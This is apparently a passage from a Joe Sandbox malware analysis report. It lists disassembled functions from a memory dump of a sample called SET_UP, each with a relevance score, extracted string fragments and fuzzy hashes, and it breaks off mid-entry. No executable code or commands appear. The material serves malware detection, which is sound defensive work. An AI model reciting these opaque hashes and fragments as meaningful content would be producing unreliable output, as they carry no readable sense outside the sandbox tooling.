                                                                                                                                            Function 0250F6FE Relevance: 4.4, Strings: 3, Instructions: 603COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: %().$n$~
                                                                                                                                            • API String ID: 0-1576559333
                                                                                                                                            • Opcode ID: f2bbb2c1cbcc91e4ef295ce591337a990f121c3deeedab843836382ded43cda7
                                                                                                                                            • Instruction ID: 0f92f81416cce464afad44453d8dde972b198708734e5530052830608fa21951
                                                                                                                                            • Opcode Fuzzy Hash: f2bbb2c1cbcc91e4ef295ce591337a990f121c3deeedab843836382ded43cda7
                                                                                                                                            • Instruction Fuzzy Hash: 2E12BCB150C3C28BD3358F2598A07EFBFE1AF92344F28596CD4C64B252DB74514ACB9A
                                                                                                                                            Function 0252E5D7 Relevance: 4.1, Strings: 3, Instructions: 345COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: -$2&<`$Vj o
                                                                                                                                            • API String ID: 0-4013841480
                                                                                                                                            • Opcode ID: 83bbf94eafdc4ae29a338e2026d0ca5b789be40464f5c298abb6dbd50a111ba0
                                                                                                                                            • Instruction ID: 24aede1ce56d0d43e4584b8fa46bc51ccc5bff831d555c87da50b5555121f421
                                                                                                                                            • Opcode Fuzzy Hash: 83bbf94eafdc4ae29a338e2026d0ca5b789be40464f5c298abb6dbd50a111ba0
                                                                                                                                            • Instruction Fuzzy Hash: FEA1243050C3A28BD339CF2884617BBBFE1AF97314F18496DD4D9972C2D77884098B96
                                                                                                                                            Function 0251966E Relevance: 3.0, Strings: 2, Instructions: 538COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: }{$}~
                                                                                                                                            • API String ID: 0-750507644
                                                                                                                                            • Opcode ID: 4523f89c0784cc2d44093adb829dad02dced3539e37ad648681613bc814ba41b
                                                                                                                                            • Instruction ID: 13aa4a2a934dc7a9104ebbf09012dbc08747ada9dd3edbaf6c980f906eb2af0e
                                                                                                                                            • Opcode Fuzzy Hash: 4523f89c0784cc2d44093adb829dad02dced3539e37ad648681613bc814ba41b
                                                                                                                                            • Instruction Fuzzy Hash: 220216755083228BD724CF28C4906ABBBF2FFD5764F19992DE8C99B3A0E7348841C746
                                                                                                                                            Function 025284D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #"! $}
                                                                                                                                            • API String ID: 0-1365762979
                                                                                                                                            • Opcode ID: 8eea1f4ba102a5f63d7a380aec1b2632936cb7d700f8d8f5d7bdc8a8f683ffee
                                                                                                                                            • Instruction ID: b3c182d336c5bf692111c23b70f0113169e898263559f5c27c49a2bc0dda5881
                                                                                                                                            • Opcode Fuzzy Hash: 8eea1f4ba102a5f63d7a380aec1b2632936cb7d700f8d8f5d7bdc8a8f683ffee
                                                                                                                                            • Instruction Fuzzy Hash: 81D15A72A043218BD718CEA4C88577BB7A2FBD6314F19892DD8865B3C1D735A80DC7A9
                                                                                                                                            Function 0251DE00 Relevance: 2.9, Strings: 2, Instructions: 418COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: a{$~y
                                                                                                                                            • API String ID: 0-3182041098
                                                                                                                                            • Opcode ID: 3d454d49985a2a0e3b941ede6320639c585380cceb87bdbe4e8007742991eaa4
                                                                                                                                            • Instruction ID: 6d4cc9258561073a9594305d7586ff239f170667fd227ce06e817aa9cbd82663
                                                                                                                                            • Opcode Fuzzy Hash: 3d454d49985a2a0e3b941ede6320639c585380cceb87bdbe4e8007742991eaa4
                                                                                                                                            • Instruction Fuzzy Hash: 56B1F2759083108BD724DF28C89267BBBF1FF86324F098A5CE9D59B390E7349905C78A
                                                                                                                                            Function 0252791D Relevance: 2.9, Strings: 2, Instructions: 386COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ,w|y$q^jd
                                                                                                                                            • API String ID: 0-2006020141
                                                                                                                                            • Opcode ID: e44ec9f5972295231e1a7f95af0708fdedf6b1ccd8b975f045f7f121f95a013f
                                                                                                                                            • Instruction ID: cb72798b86513932922b2ed281c97901f4f23d9f8c4ce9382925d6c797246bcb
                                                                                                                                            • Opcode Fuzzy Hash: e44ec9f5972295231e1a7f95af0708fdedf6b1ccd8b975f045f7f121f95a013f
                                                                                                                                            • Instruction Fuzzy Hash: 62C14C329183648FD714CEA4C8452BB7BA2FB97340F08C96DE9858B3C5D338D909D7A9
                                                                                                                                            Function 02505B30 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: )$IEND
                                                                                                                                            • API String ID: 0-707183367
                                                                                                                                            • Opcode ID: d282cb71a6565c87ad7bf32bce1f9429e71d541d9426edf688742cf3a915deb3
                                                                                                                                            • Instruction ID: 7a21d9754596ccb616252df7499b83b2fe9ae8c424252caafa0d13874db9a313
                                                                                                                                            • Opcode Fuzzy Hash: d282cb71a6565c87ad7bf32bce1f9429e71d541d9426edf688742cf3a915deb3
                                                                                                                                            • Instruction Fuzzy Hash: 1FD18BB19083459BD720CF14DC84B9ABBE4BB94304F44492DF9999B3C2E375E908CF9A
                                                                                                                                            Function 0251DA24 Relevance: 2.8, Strings: 2, Instructions: 326COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ()$A<=2
                                                                                                                                            • API String ID: 0-3644477229
                                                                                                                                            • Opcode ID: 13cead21adfc3660f62ffef5166130110384360239f5b3c3a1c31cea8a528ae9
                                                                                                                                            • Instruction ID: 1e0cbf560021110380a63c7f9c49140ccaae84e80524269b72b7184d49f74de2
                                                                                                                                            • Opcode Fuzzy Hash: 13cead21adfc3660f62ffef5166130110384360239f5b3c3a1c31cea8a528ae9
                                                                                                                                            • Instruction Fuzzy Hash: B19102B16093158BD314DF28C8927ABB7F1FF85354F08996CE8968B391E778C504CB4A
                                                                                                                                            Function 0251D706 Relevance: 2.7, Strings: 2, Instructions: 236COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: -*$y{
                                                                                                                                            • API String ID: 0-2836670745
                                                                                                                                            • Opcode ID: 6cc00925bffcdce1ee7ce2de3b6d5e5d096557378b2750a9a0660d1b5e774ca4
                                                                                                                                            • Instruction ID: ecbf11a0fe4598c17b307bcf43140bf16f84f2fc8300ef6f7b91b770068a707a
                                                                                                                                            • Opcode Fuzzy Hash: 6cc00925bffcdce1ee7ce2de3b6d5e5d096557378b2750a9a0660d1b5e774ca4
                                                                                                                                            • Instruction Fuzzy Hash: 8471F2B295C3509BE718DF65C84156FBBF2EFC1314F48892CF5C68B241E635CA098B8A
                                                                                                                                            Function 02517606 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 7$gfff
                                                                                                                                            • API String ID: 0-3777064726
                                                                                                                                            • Opcode ID: 7d0e5fa15a847eb0a20af8f6850efbcd8d9db661e09e237ac2fc1ecf391396a1
                                                                                                                                            • Instruction ID: 1ecd1b0e3c0e4f56fd2339aeb896789b88c9c1ce40d162c0e4717fb38d27f1a8
                                                                                                                                            • Opcode Fuzzy Hash: 7d0e5fa15a847eb0a20af8f6850efbcd8d9db661e09e237ac2fc1ecf391396a1
                                                                                                                                            • Instruction Fuzzy Hash: BD6126766142104FE314CF2DCC55B6BB7D2ABC5328F19CA79E499C7291DB38C846CB49
                                                                                                                                            Function 0252A53D Relevance: 2.7, Strings: 2, Instructions: 176COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: L$qr
                                                                                                                                            • API String ID: 0-2663492237
                                                                                                                                            • Opcode ID: 20aecfe946979eed5e562ca66601960c3d66dc17e684e02ab7c8fb984b1e249d
                                                                                                                                            • Instruction ID: 69e92f8db0107abff2a9313dd7eba84487fa09d0861d66c1b6b95341e11e1589
                                                                                                                                            • Opcode Fuzzy Hash: 20aecfe946979eed5e562ca66601960c3d66dc17e684e02ab7c8fb984b1e249d
                                                                                                                                            • Instruction Fuzzy Hash: 5D51C372A5C3264BD718CF39980129FF6E2ABC4214F0AC93DD495DB381DA74C50A8BC6
                                                                                                                                            Function 0251E297 Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: [U$_8Y
                                                                                                                                            • API String ID: 0-1769107113
                                                                                                                                            • Opcode ID: 48076ce9a52beb17b8c5ea630022c16e9e5239f74c0bd8c9b8a234c0ba14967a
                                                                                                                                            • Instruction ID: 7f58e591aceba7e8cd94fd7c39ab4c69ab552a8093d39f2b6de7130801e8de0b
                                                                                                                                            • Opcode Fuzzy Hash: 48076ce9a52beb17b8c5ea630022c16e9e5239f74c0bd8c9b8a234c0ba14967a
                                                                                                                                            • Instruction Fuzzy Hash: DA51A07160C3108BE724DF29C85272BBBF1EF96718F14495CE8D59B291E339D502CB4A
                                                                                                                                            Function 0251B1B0 Relevance: 2.4, Strings: 1, Instructions: 1151COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: FG
                                                                                                                                            • API String ID: 0-255995471
                                                                                                                                            • Opcode ID: 5f4c62b8eee3854e5845d4c7cc9f491471021144c18d031431836d4e0dba5ec0
                                                                                                                                            • Instruction ID: 9e027c722202a1b09089e6ccc156680e396e015dbdf8167b0b1fa32932c14a40
                                                                                                                                            • Opcode Fuzzy Hash: 5f4c62b8eee3854e5845d4c7cc9f491471021144c18d031431836d4e0dba5ec0
                                                                                                                                            • Instruction Fuzzy Hash: E882E1746083419BF7259B24D881B2BBFE2FFC6718F28882CE5C547262D771D846CB5A
                                                                                                                                            Function 0253DD60 Relevance: 2.0, Strings: 1, Instructions: 701COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: f
                                                                                                                                            • API String ID: 0-1993550816
                                                                                                                                            • Opcode ID: 617e2c46c5da944dbde900e93ad42fb2cbbed75b6950a5affe13006b49ce5f4a
                                                                                                                                            • Instruction ID: 9383fbabf50fed4461fc523d74c8235ed9ff4eec49c31796c68514ba3869291a
                                                                                                                                            • Opcode Fuzzy Hash: 617e2c46c5da944dbde900e93ad42fb2cbbed75b6950a5affe13006b49ce5f4a
                                                                                                                                            • Instruction Fuzzy Hash: 372203716083018FC719CF28C890B6ABBE2BFD8318F19897CE8958B391E775D945CB46
                                                                                                                                            Function 025233D0 Relevance: 1.7, Strings: 1, Instructions: 491COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: XY
                                                                                                                                            • API String ID: 0-554446067
                                                                                                                                            • Opcode ID: dea41095a41f694388628f6acae864739dca9d54eb0c94e04d4e19212d53dbe2
                                                                                                                                            • Instruction ID: ee99114fea72278750537ed0275cf0ec92b0c34636c0cf853102efaad6366578
                                                                                                                                            • Opcode Fuzzy Hash: dea41095a41f694388628f6acae864739dca9d54eb0c94e04d4e19212d53dbe2
                                                                                                                                            • Instruction Fuzzy Hash: 1FC127756043216BD7149B24C89267BB7E6FFC2324F09896DE885873C1E37CE909C79A
                                                                                                                                            Function 0252C710 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: "
                                                                                                                                            • API String ID: 0-123907689
                                                                                                                                            • Opcode ID: e6be611f108122d985c62c8225029fe49cc0ea6a2879ff912ae975b4a5032a4a
                                                                                                                                            • Instruction ID: cd71b9a3724639ebacd59269cd2270eddd6510bd1e0aee9e5a112c44d9ef09d1
                                                                                                                                            • Opcode Fuzzy Hash: e6be611f108122d985c62c8225029fe49cc0ea6a2879ff912ae975b4a5032a4a
                                                                                                                                            • Instruction Fuzzy Hash: C1D1B3B1A083215FC714CE24C48076FBBE6BBC6215F1A896EE899973C2D734E948C7D5
                                                                                                                                            Function 0250C2E0 Relevance: 1.6, Strings: 1, Instructions: 375COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: G
                                                                                                                                            • API String ID: 0-985283518
                                                                                                                                            • Opcode ID: 70dc6fffec8001c489d5f64c8bcfb6d1fe1721603c762928a24debc60d885bf5
                                                                                                                                            • Instruction ID: 762b371150e9a08892e282a66464ba7d1f2cedb5d8df78ac8af465a2291c0f05
                                                                                                                                            • Opcode Fuzzy Hash: 70dc6fffec8001c489d5f64c8bcfb6d1fe1721603c762928a24debc60d885bf5
                                                                                                                                            • Instruction Fuzzy Hash: D5C1197564C3904BD728CF68889136FFFE2ABC2219F189A2DE4E64B3C1D7758805C75A
                                                                                                                                            Function 025192BE Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: `
                                                                                                                                            • API String ID: 0-1519715813
                                                                                                                                            • Opcode ID: 3439217d4c4f13435b3223d5bd9ba68689547e1578aae4c11f12cad9d66b1292
                                                                                                                                            • Instruction ID: 49388f60ce88740bc4d11a8870d73fbf30527994c92e53a1b4323eac1fdfd71a
                                                                                                                                            • Opcode Fuzzy Hash: 3439217d4c4f13435b3223d5bd9ba68689547e1578aae4c11f12cad9d66b1292
                                                                                                                                            • Instruction Fuzzy Hash: B9913B729043218BD324CF25C4A16ABBBE1FFC9754F198A2DE4CA5B760E7748941C789
                                                                                                                                            Function 02523080 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: uw
                                                                                                                                            • API String ID: 0-2711446736
                                                                                                                                            • Opcode ID: 978e60d82e05408f93c10bdb6a4249a674e0d6963b9157e95e94cf9afbc10a09
                                                                                                                                            • Instruction ID: 5727292f1c79e9931231c16664eaddf1400356d7374e609d868c9c9065f72641
                                                                                                                                            • Opcode Fuzzy Hash: 978e60d82e05408f93c10bdb6a4249a674e0d6963b9157e95e94cf9afbc10a09
                                                                                                                                            • Instruction Fuzzy Hash: A5911371604311ABD710DF24CC82B6B77A1FFC6318F14896CE9858B2D1E739E909CB5A
                                                                                                                                            Function 0252C70C Relevance: 1.6, Strings: 1, Instructions: 304COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: "
                                                                                                                                            • API String ID: 0-123907689
                                                                                                                                            • Opcode ID: 262a625a2522ef4760e7e7239e829c4497be80a39b0b90b7edc4fe4c690962c8
                                                                                                                                            • Instruction ID: 23a2f3bb1fb1da9e20da6afb8e02eee56c9da8fc82e3113c6b74005c52ff3842
                                                                                                                                            • Opcode Fuzzy Hash: 262a625a2522ef4760e7e7239e829c4497be80a39b0b90b7edc4fe4c690962c8
                                                                                                                                            • Instruction Fuzzy Hash: 1F91C5B1A043615FDB14CE24C89076FBBD6BBC6615F0A892EE895872C3E734D808C7D6
                                                                                                                                            Function 02509B00 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: P2D
                                                                                                                                            • API String ID: 0-255600218
                                                                                                                                            • Opcode ID: fef0fe52f77a95a924cea6780147be2365623c181795e71900b2fdbe9a05d8d5
                                                                                                                                            • Instruction ID: 56d8c940f711c4bb765a57182b04c906e4bb4dfa504c74c81b5f049cd87b297d
                                                                                                                                            • Opcode Fuzzy Hash: fef0fe52f77a95a924cea6780147be2365623c181795e71900b2fdbe9a05d8d5
                                                                                                                                            • Instruction Fuzzy Hash: 47910C73F086624BC3108D3DCDC025ABBD2BBC5A64F198A29D895DB3DAE238DD4587C5
                                                                                                                                            Function 0251E600 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ~
                                                                                                                                            • API String ID: 0-1707062198
                                                                                                                                            • Opcode ID: 0aea7c8fb855695330f7eb568e2e132acdcf9a8eae631734386d19accc15f901
                                                                                                                                            • Instruction ID: f6ae513f4d38e242552014a67f967ec1e4103a426ae0732bd6ddc5ad804276f3
                                                                                                                                            • Opcode Fuzzy Hash: 0aea7c8fb855695330f7eb568e2e132acdcf9a8eae631734386d19accc15f901
                                                                                                                                            • Instruction Fuzzy Hash: 76813972A042614FEB26CE28C85135ABBD1BB85224F19C67CECB99B3D2D7348806C7D1
                                                                                                                                            Function 0252F248 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: {Ftw
                                                                                                                                            • API String ID: 0-1818186142
                                                                                                                                            • Opcode ID: dd9fde14b8f54b0dd6a43ef3875e77c449cdeca989125b396de5973d5cfe6629
                                                                                                                                            • Instruction ID: acfe71d7202045d3e2d4729cf625e08cf4174246758271b4cd1b1f0a41541b8e
                                                                                                                                            • Opcode Fuzzy Hash: dd9fde14b8f54b0dd6a43ef3875e77c449cdeca989125b396de5973d5cfe6629
                                                                                                                                            • Instruction Fuzzy Hash: 5E51167061C3A24BE71DCF39A46037FBFE1AB97604F184A6DE0D3976C2D628850D8796
                                                                                                                                            Function 0252F7D1 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: {Ftw
                                                                                                                                            • API String ID: 0-1818186142
                                                                                                                                            • Opcode ID: 21b2f5035a54652b185ed80430efff77460fc35e5fa87f1e6a2044e1d17f9747
                                                                                                                                            • Instruction ID: c0a071c44665ff893ac64fe291cce02c10742f814b0ecd699ca66392bbec79c9
                                                                                                                                            • Opcode Fuzzy Hash: 21b2f5035a54652b185ed80430efff77460fc35e5fa87f1e6a2044e1d17f9747
                                                                                                                                            • Instruction Fuzzy Hash: DA51266061C3A24BE71DCF39A46077BBFE1AF97604F184A5CE0D29B6C2D728850DC796
                                                                                                                                            Function 0252EAFA Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: {Ftw
                                                                                                                                            • API String ID: 0-1818186142
                                                                                                                                            • Opcode ID: 0bad9244c838ad41c448172ebadc09af827445c4a3a9c5fa16341be90e94a565
                                                                                                                                            • Instruction ID: 4ee66f655d7cf198031b60870fa38f6676ef5120f158a90aad3d90cba9aad2de
                                                                                                                                            • Opcode Fuzzy Hash: 0bad9244c838ad41c448172ebadc09af827445c4a3a9c5fa16341be90e94a565
                                                                                                                                            • Instruction Fuzzy Hash: 0651F3A060C3A24BD719CF29A46077BBFE1AB97604F184A9CE0D25B6C2D7348509C797
                                                                                                                                            Function 025347C0 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: d
                                                                                                                                            • API String ID: 0-2564639436
                                                                                                                                            • Opcode ID: 1f72c32348d33f613e9e3dafbd354bcd63e1970f35f915b936e67e7a936da18e
                                                                                                                                            • Instruction ID: 404c9c3a2287ed38905c75c5bb19e347357db47f3a2aaf8d8eb1fab0ab6b8f84
